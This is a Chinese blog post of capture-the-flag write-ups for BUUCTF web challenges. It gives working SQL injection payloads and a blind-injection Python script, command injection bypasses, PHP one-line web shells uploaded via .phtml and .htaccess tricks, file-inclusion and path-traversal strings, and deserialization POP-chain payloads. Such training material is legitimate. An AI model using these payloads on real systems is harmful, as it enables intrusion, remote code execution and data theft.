CTF刷题-buuoj.cn
CTF刷题
WEB
buuoj.cn-[极客大挑战 2019]EasySQL
万能公式
1 and 1=1
1' and '1'='1
1 or 1=1
1' or '1'='1
http://43ffd150-ad6f-4a6f-bfe1-09e4486466fd.node4.buuoj.cn:81/check.php?username=1'or '1'='1&password=1'or '1'='1
[极客大挑战 2019]Havefun
右键查看源码
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
http://1c4bde13-b1bc-47b9-a000-2a2ab8f02b70.node4.buuoj.cn:81/?cat=dog
[HCTF 2018]WarmUp
简单的php代码审计。
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
payload:
62704325-c9b0-4e15-bdad-cc1495651f9c.node4.buuoj.cn:81/?file=hint.php?../../../../../../../../ffffllllaaaagggg
参考链接:
https://blog.csdn.net/qq_63548648/article/details/128067255
[ACTF2020 新生赛]Include
文件包含:
http://feadec16-bcf9-4fcf-a5e0-0df54c397f7b.node4.buuoj.cn:81/?
file=php://filter/convert.base64-encode/resource=flag.php
index.php源码:
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
文件包含参考链接:
https://www.anquanke.com/post/id/248627#h3-11
[ACTF2020 新生赛]Exec
命令执行
127.0.0.1;cat /flag
[GXYCTF2019]Ping Ping Ping
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$1index.php
index.php源码:
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
方法一:
变量拼接:
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
方法二:
base64编码绕过
echo "cat flag.php"|base64
生成base64 Y2F0IGZsYWcucGhwCg==
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|
echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d$IFS$1|$IFS$1sh
命令执行绕过姿势参考文章
https://blog.csdn.net/m0_64815693/article/details/127268809
http://www.360doc.com/content/21/0909/17/71923083_994810060.shtml
[SUCTF 2019]EasySQL
第一种方法:
1;set sql_mode=PIPES_AS_CONCAT;select 1
第二种方法:
*,1
[极客大挑战 2019]Secret File
简单的文件包含
http://b0072723-9ac4-4df9-a175-77d60e59735a.node4.buuoj.cn:81/Archive_room.php
burpsuite抓包
/secr3t.php
简单的php文件包含
/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]LoveSQL
注意#使用 %23
/check.php?username=1' union select 1,database(),version()%23&password=1
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
[极客大挑战 2019]Http
http协议更改
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
发送的请求头:
GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26614
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
[极客大挑战 2019]Knife
不用动脑的题目,直接菜刀或者shell管理工具链接过去就行。
[极客大挑战 2019]Upload
文件头绕过
GIF89a
文件名后缀phtml绕过
Content-Disposition: form-data; name="file"; filename="flag.phtml"
Content-Type: image/png
GIF89a
<script language='php'>@eval($_POST[shell]);</script>
shell连接地址upload/flag.phtml
[ACTF2020 新生赛]Upload
上传phtml
POST / HTTP/1.1
Host: 684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145469643534879765234084248244
Content-Length: 402
Origin: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
Connection: close
Referer: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="upload_file"; filename="1111.phtml"
Content-Type: image/jpeg
<script language='php'>@eval($_POST[shell]);</script>
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="submit"
upload
-----------------------------145469643534879765234084248244--
[极客大挑战 2019]BabySQL
双写绕过
username=admin&password=123456' ununionion selselectect 1,2,3 %23
username=admin&password=123456' ununionion selselectect 1,2,database() %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) from information_schema.schemata %23
admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) frfromom (infoorrmation_schema.schemata) %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(table_name) frfromom (infoorrmation_schema.tables) whwhereere table_schema='ctf' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' and table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' aandnd table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,flag frfromom ctf.Flag %23
[极客大挑战 2019]PHP
反序列化题目。
知识点:网站备份+wakeup绕过
注意空格,使用%00绕过。
http://bc2f74ae-5a22-4516-91f4-c0a3620d0016.node4.buuoj.cn:81/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
参考连接:https://blog.csdn.net/qq_58166735/article/details/128248384
[ACTF2020 新生赛]BackupFile
知识点:寻找备份文件+php弱类型比较
备份文件:index.php.bak
http://89295bcb-1c0e-4e2b-a068-42add2e5e913.node4.buuoj.cn:81/index.php?key=123
[RoarCTF 2019]Easy Calc
查看phpinfo,发现禁用了大部分函数。
下面使用函数:var_dump()、scandir()进行绕过。
? num=var_dump(scandir(chr(47)))
num=file_get_contents(/f1agg) 转化为:
num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
使用python将字符串转化为ascii字符,绕过waf对字母数字的限制。
str1 = "/f1agg"
flag = ""
for char in str1:
flag += "chr("+str(ord(char))+")."
print(flag.rstrip('.'))
参考连接:
https://blog.csdn.net/m0_62905261/article/details/127027095
[极客大挑战 2019]BuyFlag
知识点:is_numeric()的绕过
源码:
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
POST /pay.php HTTP/1.1
Host: 446f2935-4a7a-4da6-accf-a706b6f11595.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
password=404e&money[]=a
[BJDCTF2020]Easy MD5
知识点:md5的数组绕过、哈希碰撞绕过、弱类型绕过。
参考:
https://blog.csdn.net/qq_63548648/article/details/128144485
[护网杯 2018]easy_tornado
知识点:模板注入
参考链接:https://blog.csdn.net/qq_51927659/article/details/116031923
[HCTF 2018]admin
知识点:unicode欺骗、flask session 伪造、条件竞争
https://blog.csdn.net/qq_63928796/article/details/125637749
[MRCTF2020]你传你🐎呢
知识点:文件上传、.htaccess文件的利用
.htaccess文件
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
随便上传一张图片进行修改为php,写入一句话,连接shell即可获得flag。
[ZJCTF 2019]NiZhuanSiWei
知识点:php伪协议、php反序列化
http://d725a3cd-5e90-48b6-ac58-f7b643407b5e.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
参考链接:https://blog.csdn.net/wo41ge/article/details/109705195
[MRCTF2020]Ezpop
知识点:反序列化漏洞POP链构造
源码:
<?php
//flag is in flag.php
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
payload:
<?php
class Modifier {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Test{
public $p;
}
class Show{
public $source;
public $str;
}
$pop = new Show();
$pop->source = new Show();
$pop->source->str = new Test();
$pop->source->str->p = new Modifier();
echo urlencode(serialize($pop));
?>
[极客大挑战 2019]HardSQL
知识点:Sql注入绕过方法、fuzz sql
FUZZ字典:
^
&
&&
|
||
and
And
anandd
AnanDd
or
Or
oorr
union
uNIon
ununionion
UnunionIOn
substr
length
ascii
=
>
/**/
(
)
<
select
selselect
SeleCT
updatexml
extractvalue
floor
limit
select
selselectect
concat
group
by
order
information_schema
tables
where
left
right
regexp
使用报错注入:
爆破数据库名称:
1'or(extractvalue(1,concat(0x7e,(select(database())),0x7e)))#
爆破数据表名称:
1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e)))#
爆破数据表字段名称:
1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e)))#
爆破数据表flag值:
1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#
爆破数据表flag值,使用right()函数,读取剩余值:
1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#
或者使用python直接爆破读取,程序:
import requests
import time
#去掉了大写字母,可手动加上,ABCDEFGHIJKLMNOPQRSTUVWXYZ
#未写停止判断,当判断到strings最后一位且flag未在其中时停止即可
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~'
i = 1
flag = ''
while i < 80:
for one_char in strings:
one_char = flag + one_char
url = "http://f3c46938-d2a9-478f-90d3-bf91cbacee62.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"
time.sleep(0.05)
rs = requests.get(url)
if 'flag' in rs.text:
flag = one_char
print("\r", end="")
print('flag为:' + flag, end='')
break
参考链接:
https://www.cnblogs.com/upfine/p/16578800.html
[MRCTF2020]Ez_bypass
知识点:php弱类型比较
POST /index.php?id[]=1&gg[]=2 HTTP/1.1
Host: 96e1d642-96c0-4702-ba21-dd06bd7dbebf.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
passwd=1234567nonono
[网鼎杯 2020 青龙组]AreUSerialz
知识点:
1.file_get_content()可以读取php://filter伪协议。
2.protected/private类型的属性序列化后产生不可打印字符,public类型则不会。
3.PHP7.1+对类的属性类型不敏感。
4.关于强弱类型比较“ === ”、“ == ”。
<?php
class FileHandler {
public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
public $content;
}
$a = new FileHandler();
echo serialize($a);
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
[SUCTF 2019]CheckIn
知识点:上传绕过
Content-Type: application/octet-stream
GIF89a
auto_prepend_file=test2.gif
Content-Type: image/gif
GIF89a
<script language='php'>eval($_GET['cmd'])</script>
一些命令执行的函数:
# 代码 <script language="php">eval($_GET[cmd]);</script>
# eval() eval — 把字符串作为PHP代码执行;因此 eval 本身是没有命令执行的功能,只能执行php中的函数和代码。
#注意:
# eval() 函数不能执行含有 “<?php ?>” 开始/结束标签的代码, 除此之外,传入的必须是有效的 PHP 代码。所有的语句必须以分号结尾。
# php 文件系统常用函数
scandir — 列出指定路径中的文件和目录
getcwd — 取得当前工作目录
chdir — 改变目录
# php 命令执行函数
system — 执行外部程序,并且显示输出
exec — 执行一个外部程序
passthru — 执行外部程序并且显示原始输出
var_dump(scandir("/"));
system("cat /flag");
参考链接:
https://blog.csdn.net/qq_45925514/article/details/125085474
[GXYCTF2019]BabyUpload
知识点:.htaccess文件利用
<FilesMatch "1.jpeg">
SetHandler application/x-httpd-php
GIF89a?
[GXYCTF2019]BabySQli
知识点:SQL查询构建虚拟数据
payload:
name=1'+union+select+1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
本文来自博客园,作者:admax11,转载请注明原文链接:https://www.cnblogs.com/ctfisnull/p/17505368.html
